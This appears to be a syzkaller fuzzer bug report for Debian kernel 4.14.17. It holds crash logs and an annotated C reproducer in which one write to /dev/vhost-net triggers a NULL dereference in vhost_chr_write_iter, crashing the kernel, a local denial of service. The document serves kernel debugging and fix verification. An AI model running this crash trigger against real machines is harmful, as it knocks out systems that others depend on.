Syzkaller hit 'UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE' bug. Kernel: Debian package linux-source-4.14 (4.14.17), built with UBSAN and KASAN enabled. Summary: a single write(2) on a freshly opened /dev/vhost-net, with no ioctl issued beforehand, reaches vhost_chr_write_iter with a NULL 'struct rb_root_cached' (vhost.c:52). UBSAN only reports the null member access and lets execution continue, so the general protection fault that follows is the same NULL dereference (RBX is 0 at the faulting instruction, which the code bytes show to be an inline KASAN shadow check), not a second bug. Any process permitted to open /dev/vhost-net read-write can therefore oops the kernel: a local denial of service whose reach depends on the device node's permissions (typically root-only, but some distributions grant a group such as kvm read-write access). Log & repro: Syzkaller hit 'UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE' bug. tun: Universal TUN/TAP device driver, 1.6 ================================================================================ UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1 member access within null pointer of type 'struct rb_root_cached' CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 Call Trace: __dump_stack lib/dump_stack.c:17 [inline] dump_stack+0xcc/0x12a lib/dump_stack.c:53 ubsan_epilogue+0xe/0x81 lib/ubsan.c:164 handle_null_ptr_deref lib/ubsan.c:281 [inline] __ubsan_handle_type_mismatch+0x165/0x42c lib/ubsan.c:323 vhost_chr_write_iter+0xe89/0x1100 [vhost] call_write_iter include/linux/fs.h:1773 [inline] new_sync_write+0x2b5/0x680 fs/read_write.c:470 __vfs_write+0xe0/0x130 fs/read_write.c:483 vfs_write+0x1aa/0x600 fs/read_write.c:569 SYSC_write fs/read_write.c:615 [inline] SyS_write+0xc1/0x190 fs/read_write.c:607 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 ================================================================================ kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN PTI Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 crc32c_generic fscrypto ecb crypto_simd cryptd glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata e1000 i2c_piix4 psmouse scsi_mod 
floppy CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 task: ffff88002c04c000 task.stack: ffff8800221d8000 RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007 RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8 RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7 R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000 R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040 FS: 0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0 Call Trace: call_write_iter include/linux/fs.h:1773 [inline] new_sync_write+0x2b5/0x680 fs/read_write.c:470 __vfs_write+0xe0/0x130 fs/read_write.c:483 vfs_write+0x1aa/0x600 fs/read_write.c:569 SYSC_write fs/read_write.c:615 [inline] SyS_write+0xc1/0x190 fs/read_write.c:607 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 48 89 ee 48 89 df e8 45 c4 ff ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42> 80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07 RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68 ---[ end trace 8a7b7d9965fb1eb2 ]---
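/* Syzkaller reproducer: # {Threaded:false Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1 FaultNth:0 EnableTun:false UseTmpDir:false HandleSegv:false WaitRepeat:false Debug:false Repro:false}
 * r0 = openat$vnet(0xffffffffffffff9c, &(0x7f0000000000)='/dev/vhost-net\x00', 0x2, 0x0)
 * write$vnet(r0, &(0x7f0000000300)={0x1, {&(0x7f0000000040)=""/28, 0x1c, &(0x7f0000000080)=""/158, 0x3, 0x3}}, 0x68)
 * C reproducer: */
// autogenerated by syzkaller (http://github.com/google/syzkaller); reformatted and annotated for review
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <endian.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * syzkaller places every syscall argument in a fixed anonymous mapping at
 * DATA_BASE so the generated addresses are stable between runs.  The two
 * addresses carried inside the message (0x20000040, 0x20000080) point into
 * this region as well.
 */
#define DATA_BASE 0x20000000UL
#define DATA_SIZE 0x1000000UL

/* Layout inside the mapping: the device path and the buffer handed to write(2). */
#define PATH_OFF 0x000UL
#define MSG_OFF  0x300UL
#define MSG_LEN  0x68UL

/* File descriptor of /dev/vhost-net; -1 until openat succeeds. */
uint64_t r[1] = {0xffffffffffffffff};

/*
 * Open /dev/vhost-net read-write and issue exactly one write(2) on it.  The
 * 0x68-byte buffer is: u32 type 1, then at +8 {u64 0x20000040, u64 0x1c,
 * u64 0x20000080, u8 3, u8 3}, then zeros.  That is the write$vnet call of the
 * syzkaller program above; the shape looks like vhost's IOTLB message
 * (struct vhost_msg / vhost_iotlb_msg) -- TODO confirm against the uapi header.
 *
 * No ioctl is issued between openat and write, so the device is still in its
 * freshly-opened state when vhost_chr_write_iter runs.  On 4.14.17 this single
 * write produces the UBSAN report at vhost.c:52 (member access through a NULL
 * 'struct rb_root_cached') and the general protection fault logged below.
 *
 * Side effects only; on a vulnerable kernel the process does not return from
 * the write.  Requires permission to open /dev/vhost-net for writing.
 */
void loop(void)
{
    uint8_t *base = (uint8_t *)DATA_BASE;
    long res;

    memcpy(base + PATH_OFF, "/dev/vhost-net", 15);
    /* -100 is AT_FDCWD, 2 is O_RDWR (kept numeric so the file builds
     * without any feature macros, as the generated code did). */
    res = syscall(__NR_openat, -100, DATA_BASE + PATH_OFF, 2, 0);
    if (res == -1) {
        /* The generated code silently went on to write(-1, ...) here, so a
         * permission problem on the device node looked like "did not
         * reproduce".  Fail loudly instead. */
        fprintf(stderr, "openat(/dev/vhost-net): %s\n", strerror(errno));
        exit(1);
    }
    r[0] = (uint64_t)res;

    memset(base + MSG_OFF, 0, MSG_LEN);
    *(uint32_t *)(base + MSG_OFF + 0x00) = 1;          /* message type */
    *(uint64_t *)(base + MSG_OFF + 0x08) = 0x20000040; /* first address */
    *(uint64_t *)(base + MSG_OFF + 0x10) = 0x1c;       /* size */
    *(uint64_t *)(base + MSG_OFF + 0x18) = 0x20000080; /* second address */
    *(uint8_t *)(base + MSG_OFF + 0x20) = 3;
    *(uint8_t *)(base + MSG_OFF + 0x21) = 3;
    /* bytes 0x22..0x67 stay zero, as in the generated program */

    res = syscall(__NR_write, r[0], DATA_BASE + MSG_OFF, MSG_LEN);
    /* Only reached on a kernel that rejects or survives the message; the
     * return value tells a tester whether a fix is in place. */
    printf("write returned %ld%s%s\n", res,
           res == -1 ? ", errno: " : "",
           res == -1 ? strerror(errno) : "");
}

/*
 * Map the fixed data region and run the single-shot reproducer.
 * 3 = PROT_READ|PROT_WRITE, 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS.
 * Returns 1 if the mapping cannot be established, 0 otherwise.
 */
int main(void)
{
    if (syscall(__NR_mmap, DATA_BASE, DATA_SIZE, 3, 0x32, -1, 0) == -1) {
        fprintf(stderr, "mmap(0x%lx): %s\n", DATA_BASE, strerror(errno));
        return 1;
    }
    loop();
    return 0;
}
/* Reproducing stats: Extracting prog: 3m18.162628807s Minimizing prog: 3m29.226949856s Simplifying prog options: 0s Extracting C: 35.30580514s Simplifying C: 3m56.176783799s Reproducing log: 1350 programs, 1 VMs extracting reproducer from 1344 programs single: executing 8 programs separately with timeout 10s testing program (duration=10s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): mmap-syz_fuseblk_mount program did not crash testing program (duration=10s, {Threaded:true */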
Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): mmap-socketpair$unix-connect$unix-openat$fb0-connect$unix-socket$inet_tcp-setsockopt$sock_void-getsockopt$inet_sctp_SCTP_STREAM_SCHEDULER-ioctl$sock_inet_SIOCSIFBRDADDR-setsockopt$inet_sctp_SCTP_STREAM_SCHEDULER_VALUE-ioctl$sock_SIOCSPGRP-sendto$inet-fcntl$getownex program did not crash testing program (duration=10s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-fcntl$F_SET_FILE_RW_HINT-write$vnet program did not crash testing program (duration=10s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): umount2-mmap-socket$inet_tcp-ioctl$sock_SIOCSPGRP-fcntl$F_SET_FILE_RW_HINT-openat-bind$llc-ioctl$DRM_IOCTL_ADD_CTX-ioctl$DRM_IOCTL_GET_CTX-getsockopt$inet_pktinfo-ioctl$DRM_IOCTL_ADD_CTX-setsockopt$inet_tcp_TCP_ULP-ioctl$DRM_IOCTL_NEW_CTX program did not crash testing program (duration=10s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): mmap-syz_open_procfs-fchown-getsockopt$bt_BT_FLUSHABLE program did not crash testing program (duration=10s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS-getsockopt$inet_sctp6_SCTP_GET_PEER_ADDR_INFO-write$vnet program crashed: general protection fault in vhost_chr_write_iter single: successfully extracted reproducer found reproducer with 6 syscalls 
minimizing guilty program testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS-getsockopt$inet_sctp6_SCTP_GET_PEER_ADDR_INFO program crashed: general protection fault in vhost_chr_write_iter testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet-dup3-getsockopt$inet_sctp6_SCTP_STATUS program crashed: general protection fault in vhost_chr_write_iter testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet-dup3 program crashed: general protection fault in vhost_chr_write_iter testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet program crashed: general protection fault in vhost_chr_write_iter testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet program did not crash testing program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): write$vnet program did not crash extracting C reproducer testing compiled C program (duration=15s, {Threaded:true Collide:true Repeat:true Procs:8 
Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet program crashed: general protection fault in vhost_chr_write_iter simplifying C reproducer testing compiled C program (duration=15s, {Threaded:true Collide:false Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE testing compiled C program (duration=15s, {Threaded:false Collide:false Repeat:true Procs:8 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:true Debug:false Repro:true}): openat$vnet-write$vnet program crashed: general protection fault in vhost_chr_write_iter testing compiled C program (duration=15s, {Threaded:false Collide:false Repeat:false Procs:1 Sandbox:none Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE testing compiled C program (duration=15s, {Threaded:false Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1 FaultNth:0 EnableTun:true UseTmpDir:true HandleSegv:true WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE testing compiled C program (duration=15s, {Threaded:false Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1 FaultNth:0 EnableTun:false UseTmpDir:true HandleSegv:true WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE testing compiled C program 
(duration=15s, {Threaded:false Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1 FaultNth:0 EnableTun:false UseTmpDir:false HandleSegv:true WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE testing compiled C program (duration=15s, {Threaded:false Collide:false Repeat:false Procs:1 Sandbox: Fault:false FaultCall:-1 FaultNth:0 EnableTun:false UseTmpDir:false HandleSegv:false WaitRepeat:false Debug:false Repro:true}): openat$vnet-write$vnet program crashed: UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:LINE reproducing took 11m18.872190653s repro crashed as (corrupted=false): tun: Universal TUN/TAP device driver, 1.6 ================================================================================ UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1 member access within null pointer of type 'struct rb_root_cached' CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 Call Trace: dump_stack+0xcc/0x12a ubsan_epilogue+0xe/0x81 __ubsan_handle_type_mismatch+0x165/0x42c vhost_chr_write_iter+0xe89/0x1100 [vhost] new_sync_write+0x2b5/0x680 __vfs_write+0xe0/0x130 vfs_write+0x1aa/0x600 SyS_write+0xc1/0x190 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 ================================================================================ kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN PTI Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 
crc32c_generic fscrypto ecb crypto_simd cryptd glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata e1000 i2c_piix4 psmouse scsi_mod floppy CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 task: ffff88002c04c000 task.stack: ffff8800221d8000 RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007 RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8 RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7 R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000 R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040 FS: 0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0 Call Trace: new_sync_write+0x2b5/0x680 __vfs_write+0xe0/0x130 vfs_write+0x1aa/0x600 SyS_write+0xc1/0x190 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 48 89 ee 48 89 df e8 45 c4 ff ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42> 80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07 RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68 ---[ end trace 8a7b7d9965fb1eb2 ]--- final repro crashed as (corrupted=false): tun: Universal TUN/TAP device driver, 1.6 ================================================================================ UBSAN: Undefined behaviour in /root/linux-source-4.14/drivers/vhost/vhost.c:52:1 member access within null pointer of type 'struct rb_root_cached' CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 Call Trace: dump_stack+0xcc/0x12a ubsan_epilogue+0xe/0x81 
__ubsan_handle_type_mismatch+0x165/0x42c vhost_chr_write_iter+0xe89/0x1100 [vhost] new_sync_write+0x2b5/0x680 __vfs_write+0xe0/0x130 vfs_write+0x1aa/0x600 SyS_write+0xc1/0x190 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 ================================================================================ kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN PTI Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: vhost_net tun vhost tap cbc ceph libceph libcrc32c fscache bochs_drm ttm drm_kms_helper drm sg evdev joydev serio_raw pcspkr button parport_pc ppdev lp parport ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 crc32c_generic fscrypto ecb crypto_simd cryptd glue_helper aes_x86_64 sr_mod cdrom sd_mod ata_generic ata_piix libata e1000 i2c_piix4 psmouse scsi_mod floppy CPU: 2 PID: 567 Comm: syzkaller509507 Not tainted 4.14.17 #6 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 task: ffff88002c04c000 task.stack: ffff8800221d8000 RIP: 0010:vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: 0018:ffff8800221dfb68 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000007 RDX: 1ffff100058098f9 RSI: 0000000000000202 RDI: ffff88002c04c7c8 RBP: 000000002000005b R08: fffffbfff0b156e8 R09: fffffbfff0b156e7 R10: 0000000000000001 R11: fffffbfff0b156e8 R12: dffffc0000000000 R13: 000000002000005b R14: dffffc0000000001 R15: 0000000020000040 FS: 0000000001d26880(0000) GS:ffff88007c600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000000 CR3: 0000000079848000 CR4: 00000000000006e0 Call Trace: new_sync_write+0x2b5/0x680 __vfs_write+0xe0/0x130 vfs_write+0x1aa/0x600 SyS_write+0xc1/0x190 system_call_fast_compare_end+0x12/0x75 RIP: 0033:0x4337f9 RSP: 002b:00007ffe37087fc8 EFLAGS: 00000213 Code: 0f 84 5e 01 00 00 e8 d0 f1 1e e0 
48 89 ee 48 89 df e8 45 c4 ff ff e8 c0 f1 1e e0 48 85 db 0f 84 82 0a 00 00 48 89 d8 48 c1 e8 03 <42> 80 3c 20 00 0f 85 63 0a 00 00 48 8b 2b 48 85 ed 0f 84 0c 07 RIP: vhost_chr_write_iter+0x400/0x1100 [vhost] RSP: ffff8800221dfb68 ---[ end trace 8a7b7d9965fb1eb2 ]---